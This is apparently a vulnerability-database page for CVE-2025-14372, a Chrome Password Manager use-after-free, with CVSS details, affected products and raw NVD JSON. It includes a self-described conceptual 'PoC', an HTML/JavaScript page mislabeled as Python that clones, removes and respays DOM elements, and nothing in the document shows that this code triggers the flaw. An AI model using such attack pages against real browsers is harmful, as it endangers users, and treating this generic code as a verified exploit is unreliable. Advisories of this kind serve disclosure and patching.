Security Vulnerability Report
中文
CVE-2025-14372 CVSS 6.1 MEDIUM

CVE-2025-14372

Published: 2025-12-12 20:15:40
Last Modified: 2025-12-19 15:34:15

Description

Use after free in Password Manager in Google Chrome prior to 143.0.7499.110 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 143.0.7499.110

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-14372 PoC - Chrome Password Manager Use After Free --> <!-- This is a conceptual PoC demonstrating the attack vector --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14372 PoC</title> </head> <body> <h1>Chrome Password Manager UAF PoC</h1> <form id="loginForm" action="https://example.com/login"> <input type="text" id="username" name="username" value="testuser"> <input type="password" id="password" name="password" value="testpass"> <button type="submit">Login</button> </form> <script> // Trigger conditions for UAF in Password Manager // This PoC demonstrates the attack vector, actual exploitation requires more sophisticated techniques async function triggerUAF() { // Step 1: Interact with password manager to allocate memory const form = document.getElementById('loginForm'); const usernameField = document.getElementById('username'); const passwordField = document.getElementById('password'); // Step 2: Manipulate DOM to trigger memory corruption conditions // In real exploit, this would involve precise heap feng shui for (let i = 0; i < 1000; i++) { const clone = form.cloneNode(true); document.body.appendChild(clone); } // Step 3: Trigger garbage collection or memory pressure // to cause the UAF condition in password manager setTimeout(() => { document.querySelectorAll('form').forEach(f => f.remove()); // Force GC if available if (window.gc) window.gc(); }, 100); // Step 4: Reallocate freed memory with controlled data // to achieve code execution or sandbox escape setTimeout(() => { for (let i = 0; i < 1000; i++) { const div = document.createElement('div'); div.style.cssText = 'position:absolute;width:100px;height:100px;'; document.body.appendChild(div); } }, 200); } // Execute when page loads document.addEventListener('DOMContentLoaded', triggerUAF); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14372", "sourceIdentifier": "[email protected]", "published": "2025-12-12T20:15:39.897", "lastModified": "2025-12-19T15:34:14.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use after free in Password Manager in Google Chrome prior to 143.0.7499.110 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.109", "matchCriteriaId": "39A9DE45-E352-4B3A-93B9-91097A00A606"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_10.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://issues.chromium.org/issues/460599518", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}